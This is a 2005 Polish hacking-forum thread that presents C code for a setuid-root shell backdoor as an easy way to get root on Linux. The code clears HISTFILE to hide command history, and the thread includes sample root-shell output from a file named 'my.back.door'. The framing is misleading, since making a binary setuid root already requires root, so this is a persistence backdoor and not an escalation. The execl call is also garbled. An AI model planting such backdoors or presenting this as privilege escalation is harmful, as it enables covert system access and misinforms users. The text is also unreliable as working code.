proste zdobywanie root

czas · Styczeń 2, 2005

//*zaznaczam, ze tekst przeznaczony, dla bardziej zaawansowanych uzytkownikow forum */

przyblize moze nieco niektorym jeden ze sposobow zdobywania uprawnien uzytkownika root w systemie linux.

bedac na shellu tworzymy sobie plik o dowolnej nazwie, np. 'bd'
me@host<$ touch bd

edytujemy go w dowolny sposob (przez edycje pliku w mc, lub pico)
me@host<$ pico bd

w srodku piszemy:

Kod:

#include <unistd.h>

#include <sys/types.h>

#include <stdlib.h>



int main()

{

        unsetenv("HISTFILE");

        execl("/bin/sh","sh","-i",polish);

        return 0;

}

zapisujmy (ctrl+o) i zamykamy edytor (ctrl+x)

nastepnie musimy nadac odpowiednie wlasciwosci naszemu plikowi:
-rwsr-sr-x

nastepnie wydajemy uruchamiamy nasz program:
me@host<$ ./bd
root@host<# whoami;id
root
uid=0(root) gid=0(root) groups=0(root),..

czas · Styczeń 3, 2005

no i jak testowal ktos ? (afkors testujcie tylko na domowych komputerach u siebie) :twisted:

:?

Kobeer · Styczeń 3, 2005

Bezczelne nabijanie postow ale po co ??

A ten text zeczywiscie jest na wysokim poziomie

zapisujmy (ctrl+o) i zamykamy edytor (ctrl+x)[/b]

NETKOJI · Styczeń 3, 2005

Originally posted by czas
no i jak testowal ktos ? (afkors testujcie tylko na domowych komputerach u siebie) :twisted:

:?

Z ciekawości odpaliłem to u siebie i stało się to, o czym myślałem, że się stanie, czyli: NIC

Wyzerowała się tylko wyszczególniona zmienna środowiskowa, ale po pownownym wywołaniu shella nie dało mi to jednak root'a

czas · Styczeń 3, 2005

Originally posted by NETKOJI+--><div class='quotetop'>CYTAT(NETKOJI)</div>

<!--QuoteBegin-czas

Kliknij aby rozwinąć...

no i jak testowal ktos ? (afkors testujcie tylko na domowych komputerach u siebie) :twisted:

:?

Kliknij aby rozwinąć...

Z ciekawości odpaliłem to u siebie i stało się to, o czym myślałem, że się stanie, czyli: NIC

Wyzerowała się tylko wyszczególniona zmienna środowiskowa, ale po pownownym wywołaniu shella nie dało mi to jednak root'a

[/b]

hm... dziwne... :?

Kod:

 u@h:w$ whoami;id

test

uid=1003(test) gid=100(users) groups=100(users),98(nobody)

u@h:w$ ls -l my.back.door

-rwsr-sr-x  1 root root 10919 2004-11-26 11:45 my.back.door

u@h:w$ ./my.back.door

root@brain:/root/coder/bd# whoami;id

root

uid=0(root) gid=0(root) groups=100(users),98(nobody)

root@brain:/root/coder/bd#

szczerze mowiac, to nie wiem, czemu ci nie chodzi... moze zle wlasciwosci pliku ?

daemon42 · Styczeń 7, 2005

moze zle wlasciwosci pliku ?[/b]

tia, nie zsuidowane

proste zdobywanie root

czas

Użytkownik

czas

Użytkownik

Kobeer

Użytkownik

NETKOJI

Były Moderator

czas

Użytkownik

daemon42

Użytkownik